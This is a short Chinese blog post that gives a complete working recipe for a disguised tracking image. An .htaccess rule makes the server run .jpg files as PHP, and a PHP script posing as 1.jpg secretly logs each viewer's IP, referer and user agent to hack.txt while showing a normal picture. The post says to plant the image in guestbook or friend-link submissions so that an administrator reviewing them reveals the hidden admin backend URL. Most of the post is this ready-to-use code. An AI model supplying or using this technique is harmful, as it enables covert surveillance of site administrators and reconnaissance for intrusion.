访问我的图片就获取你ip和访问地址
新建个名为.htaccess的文件,内容如下
AddHandler application/x-httpd-php .jpg
新建个1.jpg,内容如下
<?php
function filter_dangerous_words($str){
$str = str_replace("'", "‘", $str);
$str = str_replace("\"", "“", $str);
$str = str_replace("<", "《", $str);
$str = str_replace(">", "》", $str);
return $str;
}
function getIP() {
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED')) {
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR')) {
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED')) {
$ip = getenv('HTTP_FORWARDED');
}
else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ip = getIP();
@$referer = $_SERVER['HTTP_REFERER']."\r\n";
$ua = $_SERVER['HTTP_USER_AGENT']."\r\n\r\n";
date_default_timezone_set("Asia/Shanghai");
$date_ = date("Y.m.d,h:i:sa")."\r\n";
//记录后台地址等信息
$hack = 'date: '.$date_.'ip:'.$ip."\r\n".'referer: '.$referer.'ua: '.$ua;
$hack = filter_dangerous_words($hack);
$op = fopen('hack.txt','a+');
fwrite($op,$hack);
fclose($op);
//伪装成图片
$im = imagecreatefromjpeg("2.jpg");//注意该目录下,也要有2.jpg这个图片
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
放个正常图片,名为2.jpg。
访问http://127.0.0.1/1.jpg
例子
在留言板或者申请友链页面填信息,然后提交
等管理员在后台审核的时候看到这图片
此时就会在你该文件的相同目录下生成一个hack.txt
这样就获取到后台地址了。
本文作者: iceH
本文链接: http://www.secice.cn/p/a23ac9c4
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!